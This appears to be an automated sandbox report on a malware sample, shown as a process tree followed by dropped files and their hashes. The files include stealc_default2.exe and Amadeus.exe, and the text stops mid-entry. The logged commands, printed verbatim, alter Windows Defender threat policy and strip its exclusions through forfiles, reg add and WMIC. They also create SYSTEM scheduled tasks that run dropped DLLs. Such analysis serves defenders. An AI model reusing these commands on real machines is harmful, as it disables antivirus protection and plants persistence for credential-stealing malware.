                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                    2⤵
                                                                                                                      PID:7164
                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                        3⤵
                                                                                                                        • Indirect Command Execution
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:6472
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4196
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                              PID:1052
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                          3⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:6260
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                            4⤵
                                                                                                                              PID:1240
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                5⤵
                                                                                                                                  PID:3732
                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                              3⤵
                                                                                                                              • Indirect Command Execution
                                                                                                                              PID:6220
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                4⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:6196
                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                  5⤵
                                                                                                                                    PID:1472
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                3⤵
                                                                                                                                • Indirect Command Execution
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:5572
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                  4⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5940
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:5824
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                3⤵
                                                                                                                                • Indirect Command Execution
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:3316
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                  4⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3656
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                    5⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:6228
                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                      6⤵
                                                                                                                                        PID:7052
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /DELETE /F /TN "bISIDNXXYteSJEZXLD"
                                                                                                                                2⤵
                                                                                                                                  PID:5212
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                  2⤵
                                                                                                                                    PID:5472
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                      3⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:1184
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4904
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5836
                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                            6⤵
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:6580
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZEIgHLylU\giRYMS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "nhCxYLxLNhRYHBn" /V1 /F
                                                                                                                                    2⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:4496
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /CREATE /TN "nhCxYLxLNhRYHBn2" /F /xml "C:\Program Files (x86)\ZEIgHLylU\EULsZgG.xml" /RU "SYSTEM"
                                                                                                                                    2⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:6108
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /END /TN "nhCxYLxLNhRYHBn"
                                                                                                                                    2⤵
                                                                                                                                      PID:5604
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /DELETE /F /TN "nhCxYLxLNhRYHBn"
                                                                                                                                      2⤵
                                                                                                                                        PID:6936
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "zXSfdhoZUyVxvh" /F /xml "C:\Program Files (x86)\PPPhKexxKHjU2\nuUKFbh.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2912
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "xvZIgXOxpyOKn2" /F /xml "C:\ProgramData\aiawRKtoMjRxlKVB\xaTTfyA.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:6312
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "rTsVMDZsNLtDRgdGt2" /F /xml "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\FInvmqg.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3024
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "TwQsVoxFovLmRvGRRGe2" /F /xml "C:\Program Files (x86)\sJTkDUsLcXSLC\dVbOZPO.xml" /RU "SYSTEM"
                                                                                                                                        2⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5240
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "qDiHWMOCvHNecNHUo" /SC once /ST 14:59:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EfDQwjblbGMYTvUW\yoROHydV\AbPdMiW.dll\",#1 /qididgGg 385107" /V1 /F
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3692
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /run /I /tn "qDiHWMOCvHNecNHUo"
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:6200
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "HUfdpCtBFdwYOuoar"
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4004
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 2320
                                                                                                                                        2⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:1952
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 968 -ip 968
                                                                                                                                      1⤵
                                                                                                                                        PID:7080
                                                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EfDQwjblbGMYTvUW\yoROHydV\AbPdMiW.dll",#1 /qididgGg 385107
                                                                                                                                        1⤵
                                                                                                                                          PID:6480
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EfDQwjblbGMYTvUW\yoROHydV\AbPdMiW.dll",#1 /qididgGg 385107
                                                                                                                                            2⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:6408
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "qDiHWMOCvHNecNHUo"
                                                                                                                                              3⤵
                                                                                                                                                PID:1344
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1316 -ip 1316
                                                                                                                                            1⤵
                                                                                                                                              PID:2620
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6040 -ip 6040
                                                                                                                                              1⤵
                                                                                                                                                PID:6100
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:1636
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                1⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5192

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                                                Filesize

                                                                                                                                                129B

                                                                                                                                                MD5

                                                                                                                                                a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                SHA1

                                                                                                                                                2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                SHA256

                                                                                                                                                e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                SHA512

                                                                                                                                                d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                              • C:\Program Files (x86)\PPPhKexxKHjU2\nuUKFbh.xml

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                6270a2041da66726d955d506ec7821c4

                                                                                                                                                SHA1

                                                                                                                                                b90279d3fa904b03b8e7047e768df2004ffa048c

                                                                                                                                                SHA256

                                                                                                                                                702b29d933de62cbba36ca9a488238afb680c2e5549e0ed8df6b3add2abec441

                                                                                                                                                SHA512

                                                                                                                                                37034f3033496b20fd4e91e43d17f72d9ffef034538e2ca5cf12d25c2ecc87edb08a52a2ad66fb1b61753d2a7a59bdd7be6d3c49e902a3212214fd458f6afcf9

                                                                                                                                              • C:\Program Files (x86)\ZEIgHLylU\EULsZgG.xml

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                fd65bf1bb0be2bf9d807304904985aa5

                                                                                                                                                SHA1

                                                                                                                                                7aa020653d7dc1d3758b0113cc574514261c9ec0

                                                                                                                                                SHA256

                                                                                                                                                1c79518a8cd5823716102434bf7137a8eb8eccf1df70f72732e3d875dd8b3a8e

                                                                                                                                                SHA512

                                                                                                                                                a1ccd44c47ae7af0bc4eacd57df85ae12e9aea199f01d464edf9ef8958460222ce6ac326d14ed3037fe97b107abfdead837802ff4bd3012edc180767e7f0f620

                                                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                Filesize

                                                                                                                                                2.0MB

                                                                                                                                                MD5

                                                                                                                                                380813907bf84e0f134a21fac71acfa4

                                                                                                                                                SHA1

                                                                                                                                                d61dd01cca7cf26cbac9e260b249492a1cab40cb

                                                                                                                                                SHA256

                                                                                                                                                5590efa3002e8c999db23c90651b5b4cd1689375b08118af21f24b7f136d399f

                                                                                                                                                SHA512

                                                                                                                                                771a59a12dc224e57e3b7342152384f6d2b1a9b4aa0bbbf13e436bd18703a796dcb4138be685aad6f6b2b4fbe0b029376b138b07c2452c214d54fbba1da269bd

                                                                                                                                              • C:\ProgramData\aiawRKtoMjRxlKVB\xaTTfyA.xml

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                0340cf0a6d39a20f80f605ce6b51ffd8

                                                                                                                                                SHA1

                                                                                                                                                ee40e00e75e9204a4c613bbf0c9ba87d07491fbc

                                                                                                                                                SHA256

                                                                                                                                                5cd2c5cc5ae93fb4c7b7ce00d8ffd92d10ad58263e338204d406ea0272ace13a

                                                                                                                                                SHA512

                                                                                                                                                ebaa1a81e623d990e60ebfcd979f9ab13cda139cd6e5df63e11c2e458a050e5ec02129bc9a90cdaf1e6e39100450c12d746805b77489ffea95d58ae48c7187c3

                                                                                                                                              • C:\ProgramData\mozglue.dll

                                                                                                                                                Filesize

                                                                                                                                                593KB

                                                                                                                                                MD5

                                                                                                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                SHA1

                                                                                                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                SHA256

                                                                                                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                SHA512

                                                                                                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                              • C:\ProgramData\nss3.dll

                                                                                                                                                Filesize

                                                                                                                                                2.0MB

                                                                                                                                                MD5

                                                                                                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                SHA1

                                                                                                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                SHA256

                                                                                                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                SHA512

                                                                                                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                              • C:\Users\Admin\1000238002\Amadeus.exe

                                                                                                                                                Filesize

                                                                                                                                                425KB

                                                                                                                                                MD5

                                                                                                                                                ced97d60021d4a0bfa03ee14ec384c12

                                                                                                                                                SHA1

                                                                                                                                                7af327df2a2d1e0e09034c2bdf6a47f788cec4e4

                                                                                                                                                SHA256

                                                                                                                                                9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951

                                                                                                                                                SHA512

                                                                                                                                                af0a02daa759010a1edfc78f14c5fe321c10802d0b9df55b515fe501114af0835a05bbd5dd5e2167b4b1f39bb6da787343bf9141d5f811113f71749741b47811

                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                Filesize

                                                                                                                                                187B

                                                                                                                                                MD5

                                                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                                                SHA1

                                                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                SHA256

                                                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                SHA512

                                                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                Filesize

                                                                                                                                                136B

                                                                                                                                                MD5

                                                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                SHA1

                                                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                SHA256

                                                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                SHA512

                                                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                Filesize

                                                                                                                                                150B

                                                                                                                                                MD5

                                                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                SHA1

                                                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                SHA256

                                                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                SHA512

                                                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                Filesize

                                                                                                                                                35KB

                                                                                                                                                MD5

                                                                                                                                                899cc2ba0585396e12c6119acc33eb25

                                                                                                                                                SHA1

                                                                                                                                                d0fd631b4175aa39c717d42e99fb2367d50de8f1

                                                                                                                                                SHA256

                                                                                                                                                4a687e6aab470044319cbdecaba113210230ced74d7ae4b3a4f19a6d6f7a35ff

                                                                                                                                                SHA512

                                                                                                                                                45663e5f1a8e9ce90e95be53f939f40eff167fcea9ed737b4696227d1fb8280ebde57007ba273f8bb739fc641fdc5552b5a9819c4253ad61d98ec13765e071ae

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                Filesize

                                                                                                                                                2KB

                                                                                                                                                MD5

                                                                                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                SHA1

                                                                                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                SHA256

                                                                                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                SHA512

                                                                                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                Filesize

                                                                                                                                                1KB

                                                                                                                                                MD5

                                                                                                                                                28854213fdaa59751b2b4cfe772289cc

                                                                                                                                                SHA1

                                                                                                                                                fa7058052780f4b856dc2d56b88163ed55deb6ab

                                                                                                                                                SHA256

                                                                                                                                                7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

                                                                                                                                                SHA512

                                                                                                                                                1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                Filesize

                                                                                                                                                151B

                                                                                                                                                MD5

                                                                                                                                                bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                SHA1

                                                                                                                                                9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                SHA256

                                                                                                                                                b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                SHA512

                                                                                                                                                3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                15KB

                                                                                                                                                MD5

                                                                                                                                                2568185ee8bb706bc7b37a47b7579de1

                                                                                                                                                SHA1

                                                                                                                                                307b40b79ad3b52a12afc84acc4b8655ad57faac

                                                                                                                                                SHA256

                                                                                                                                                a972215ef1a3e2bfdac6a4043d3f0e54f1fcfac777d0a137b3f334decbc45755

                                                                                                                                                SHA512

                                                                                                                                                9fa5c5387df08a36cd6279ef9fdfa28ae3f81d3dae3ac529142fbe9841ac74c4d2e229250ffdbb848520448ac5dd1e957545485a6d8bf74b2cfc4bc2d780d4d9

                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Filesize

                                                                                                                                                944B

                                                                                                                                                MD5

                                                                                                                                                9b80cd7a712469a4c45fec564313d9eb

                                                                                                                                                SHA1

                                                                                                                                                6125c01bc10d204ca36ad1110afe714678655f2d

                                                                                                                                                SHA256

                                                                                                                                                5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

                                                                                                                                                SHA512

                                                                                                                                                ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe

                                                                                                                                                Filesize

                                                                                                                                                314KB

                                                                                                                                                MD5

                                                                                                                                                6134586375c01f97f8777bae1bf5ed98

                                                                                                                                                SHA1

                                                                                                                                                4787fa996b75dbc54632cc321725ee62666868a1

                                                                                                                                                SHA256

                                                                                                                                                414becb8aabd4e8c406e84df062bee1a45cffa334ae30022078cfa71da9e330d

                                                                                                                                                SHA512

                                                                                                                                                652ed16d96b5700f105c2bab8e7258f167bc1615b6397be7340c08df7c977842844326e07fdef677aecfaf07263f99bb7968c9fc926e90e5a33d2ed793f8436b

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe

                                                                                                                                                Filesize

                                                                                                                                                1.1MB

                                                                                                                                                MD5

                                                                                                                                                8e74497aff3b9d2ddb7e7f819dfc69ba

                                                                                                                                                SHA1

                                                                                                                                                1d18154c206083ead2d30995ce2847cbeb6cdbc1

                                                                                                                                                SHA256

                                                                                                                                                d8e81d9e336ef37a37cae212e72b6f4ef915db4b0f2a8df73eb584bd25f21e66

                                                                                                                                                SHA512

                                                                                                                                                9aacc5c130290a72f1087daa9e79984565ccab6dbcad5114bfed0919812b9ba5f8dee9c37d230eeca4df3cca47ba0b355fbf49353e53f10f0ebc266e93f49f97

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe

                                                                                                                                                Filesize

                                                                                                                                                416KB

                                                                                                                                                MD5

                                                                                                                                                f5d7b79ee6b6da6b50e536030bcc3b59

                                                                                                                                                SHA1

                                                                                                                                                751b555a8eede96d55395290f60adc43b28ba5e2

                                                                                                                                                SHA256

                                                                                                                                                2f1aff28961ba0ce85ea0e35b8936bc387f84f459a4a1d63d964ce79e34b8459

                                                                                                                                                SHA512

                                                                                                                                                532b17cd2a6ac5172b1ddba1e63edd51ab53a4527204415241e3a78e8ffeb9728071bde5ae1eefabefd2627f00963f8a5458668cd7b8df041c8683252ff56b46

                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe

                                                                                                                                                Filesize

                                                                                                                                                187KB

                                                                                                                                                MD5

                                                                                                                                                7a02aa17200aeac25a375f290a4b4c95

                                                                                                                                                SHA1

